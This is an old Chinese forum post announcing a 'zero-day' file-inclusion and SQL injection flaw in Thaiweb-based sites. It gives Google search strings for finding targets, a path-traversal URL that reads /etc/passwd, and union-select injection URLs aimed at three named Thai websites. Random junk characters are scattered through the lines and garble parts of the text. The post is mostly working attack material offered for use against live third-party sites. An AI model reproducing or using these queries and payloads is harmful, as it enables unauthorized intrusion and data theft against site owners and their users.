找回密码
 立即注册
查看: 2786|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
Google之:7 J" o+ o% l% ^

1 s% u, p5 |1 g5 r% yintext:powered by Thaiweb& J" \1 o8 P3 V7 k  t) A! j) G

& X# k, P1 r2 W' X! T$ yinurl:index.php?page=board.php+ L, T, X7 g; h5 Y2 h7 |* V

! d& ?/ t7 s4 Z, B" N. I1 I& Z
7 D5 o* |  Y7 J7 q+ Q. H
3 K! }  E" o* _/ [利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd- T5 Y, @+ S  J8 [/ Q
3 e6 ~6 ~2 f  u( h+ C) f

  r+ V2 F6 Q) _7 g& y6 y4 V& b; p) Y/ n( a: S- e/ q5 }, p, Y9 Y
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'% Q* V# Q' }1 ]

* _; P+ F' I# |& C5 X" @3 ]' \8 Q - f% \8 U0 M2 F' J: _

: `* K) C: B! Mhttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--5 ^$ P6 ]7 `. V+ ?- l% p
" b. s- e& J- s. A* {
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
2 g( L" |# `& ?# @* Y; V1 F ; }0 L: E6 w" ]9 u7 J
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
; c, i: m6 F% b4 C( F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表